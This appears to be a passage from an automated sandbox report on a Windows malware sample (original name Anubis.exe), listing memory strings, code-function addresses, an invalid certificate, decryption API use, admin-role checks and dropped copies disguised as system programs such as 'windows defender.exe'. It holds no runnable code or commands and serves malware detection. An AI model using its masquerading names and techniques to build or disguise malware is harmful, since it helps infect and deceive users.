                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016608480_2_01660848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166D0200_2_0166D020
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016623080_2_01662308
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166ED780_2_0166ED78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01669F880_2_01669F88
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166862C0_2_0166862C
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166360A0_2_0166360A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016616A60_2_016616A6
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166894A0_2_0166894A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016649E80_2_016649E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166987C0_2_0166987C
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016668480_2_01666848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166082F0_2_0166082F
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016668380_2_01666838
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166D0100_2_0166D010
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016698A80_2_016698A8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166A3A20_2_0166A3A2
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01666A690_2_01666A69
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01666A780_2_01666A78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016662510_2_01666251
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016622C00_2_016622C0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016665F90_2_016665F9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016654210_2_01665421
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016654300_2_01665430
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01665F600_2_01665F60
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01669F790_2_01669F79
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01665F500_2_01665F50
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166C7F60_2_0166C7F6
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_016666080_2_01666608
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B37680_2_0B6B3768
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B0BF80_2_0B6B0BF8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B27D00_2_0B6B27D0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B02600_2_0B6B0260
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B62200_2_0B6B6220
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B2D580_2_0B6B2D58
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B59000_2_0B6B5900
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B11D80_2_0B6B11D8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B44600_2_0B6B4460
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B375B0_2_0B6B375B
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B3B510_2_0B6B3B51
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B3B1A0_2_0B6B3B1A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B0BE80_2_0B6B0BE8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B27C00_2_0B6B27C0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B3BA80_2_0B6B3BA8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B62100_2_0B6B6210
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B32E80_2_0B6B32E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B32D80_2_0B6B32D8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B06AD0_2_0B6B06AD
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B02820_2_0B6B0282
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B2D490_2_0B6B2D49
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B5D280_2_0B6B5D28
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B5D130_2_0B6B5D13
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B11C90_2_0B6B11C9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B5DB10_2_0B6B5DB1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B5D9C0_2_0B6B5D9C
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B444F0_2_0B6B444F
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0B6B58F00_2_0B6B58F0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEC1E80_2_0BBEC1E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE68600_2_0BBE6860
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEE0480_2_0BBEE048
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEE7E80_2_0BBEE7E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBED5680_2_0BBED568
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEEB870_2_0BBEEB87
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE52080_2_0BBE5208
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEE03E0_2_0BBEE03E
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE00060_2_0BBE0006
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE00400_2_0BBE0040
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEE7D80_2_0BBEE7D8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEC7380_2_0BBEC738
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBEED9D0_2_0BBEED9D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1230815_2_02A12308
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1889D15_2_02A1889D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1D02015_2_02A1D020
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1084815_2_02A10848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1360A15_2_02A1360A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1167015_2_02A11670
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A19F8815_2_02A19F88
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1ED7815_2_02A1ED78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1226015_2_02A12260
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A16A6915_2_02A16A69
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A16A7815_2_02A16A78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1625115_2_02A16251
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1A3A215_2_02A1A3A2
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A18BB215_2_02A18BB2
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A198A815_2_02A198A8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1082E15_2_02A1082E
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1683815_2_02A16838
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1D01015_2_02A1D010
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1986515_2_02A19865
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1684815_2_02A16848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A149E815_2_02A149E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1660815_2_02A16608
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1C7F615_2_02A1C7F6
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A15F6015_2_02A15F60
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A19F7915_2_02A19F79
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A15F5015_2_02A15F50
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1542115_2_02A15421
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A1543015_2_02A15430
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A165F915_2_02A165F9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530D56815_2_0530D568
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530ED9015_2_0530ED90
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530C73815_2_0530C738
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530F76015_2_0530F760
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530E7F915_2_0530E7F9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530C1E815_2_0530C1E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530686015_2_05306860
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530E04815_2_0530E048
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308A1315_2_05308A13
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308D2415_2_05308D24
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308D0F15_2_05308D0F
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308DAE15_2_05308DAE
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308D9915_2_05308D99
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530ED8215_2_0530ED82
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05308C2315_2_05308C23
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530F75015_2_0530F750
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530E03715_2_0530E037
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530004015_2_05300040
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530FB1215_2_0530FB12
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530FB4915_2_0530FB49
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530FBA015_2_0530FBA0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530520815_2_05305208
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530F2E015_2_0530F2E0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0530F2D015_2_0530F2D0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05833DA815_2_05833DA8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_058318A815_2_058318A8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583341015_2_05833410
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583478815_2_05834788
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05831FD815_2_05831FD8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583258D15_2_0583258D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05833D9815_2_05833D98
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583189815_2_05831898
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583142415_2_05831424
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583343215_2_05833432
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583143915_2_05831439
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583385D15_2_0583385D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05830F8815_2_05830F88
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583139B15_2_0583139B
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_058313B015_2_058313B0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05831FCA15_2_05831FCA
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583237715_2_05832377
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05830F7815_2_05830F78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_0583477815_2_05834778
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_018288A116_2_018288A1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182D02016_2_0182D020
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182084816_2_01820848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182230816_2_01822308
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182DA4016_2_0182DA40
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01829F8816_2_01829F88
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182360A16_2_0182360A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182167016_2_01821670
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_018249E816_2_018249E8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_018298A816_2_018298A8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182082F16_2_0182082F
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182683816_2_01826838
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182684816_2_01826848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182985416_2_01829854
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182A3A216_2_0182A3A2
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01828BB216_2_01828BB2
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182625116_2_01826251
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182226016_2_01822260
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01826A6916_2_01826A69
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01826A7816_2_01826A78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182CD9816_2_0182CD98
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_018265F916_2_018265F9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182542116_2_01825421
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182543016_2_01825430
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182CFD016_2_0182CFD0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182C7F616_2_0182C7F6
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01825F5016_2_01825F50
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01825F6016_2_01825F60
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01829F7916_2_01829F79
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0182660816_2_01826608
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059AC1C016_2_059AC1C0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059A6FF816_2_059A6FF8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059A6FE916_2_059A6FE9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059ADE8016_2_059ADE80
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059AD19016_2_059AD190
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059AD1A016_2_059AD1A0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059A684716_2_059A6847
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D31D4016_2_05D31D40
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3247016_2_05D32470
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3142016_2_05D31420
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D34C2016_2_05D34C20
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D353B416_2_05D353B4
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3424016_2_05D34240
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D31D3016_2_05D31D30
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D318D116_2_05D318D1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D338CA16_2_05D338CA
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D358B416_2_05D358B4
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D318BC16_2_05D318BC
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3184816_2_05D31848
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3246016_2_05D32460
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D34C1116_2_05D34C11
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3141016_2_05D31410
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3280F16_2_05D3280F
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3183316_2_05D31833
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D3423016_2_05D34230
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_05D32A2516_2_05D32A25
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A494B7816_2_0A494B78
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49FB0016_2_0A49FB00
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A493D4816_2_0A493D48
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49E3F016_2_0A49E3F0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A4937F816_2_0A4937F8
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49FAF016_2_0A49FAF0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49E94016_2_0A49E940
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49E93016_2_0A49E930
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49E3DF16_2_0A49E3DF
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49E3A016_2_0A49E3A0
                            Source: 3u8A2xjbBT.exeStatic PE information: invalid certificate
                            Source: 3u8A2xjbBT.exe, 00000000.00000000.1254425565.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3710064092.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3717623795.000000000C120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A2AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exeBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3u8A2xjbBT.exe, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows multimedia platform.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows nt.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows photo viewer.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows portable devices.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows sidebar.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: autoit3.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windowspowershell.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: common files.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: google.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows nt.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows nt.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: common files.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: common files.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows multimedia platform.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows multimedia platform.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows portable devices.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows portable devices.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows sidebar.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows sidebar.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windowspowershell.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windowspowershell.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 3u8A2xjbBT.exe, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3u8A2xjbBT.exe, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: autoit3.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
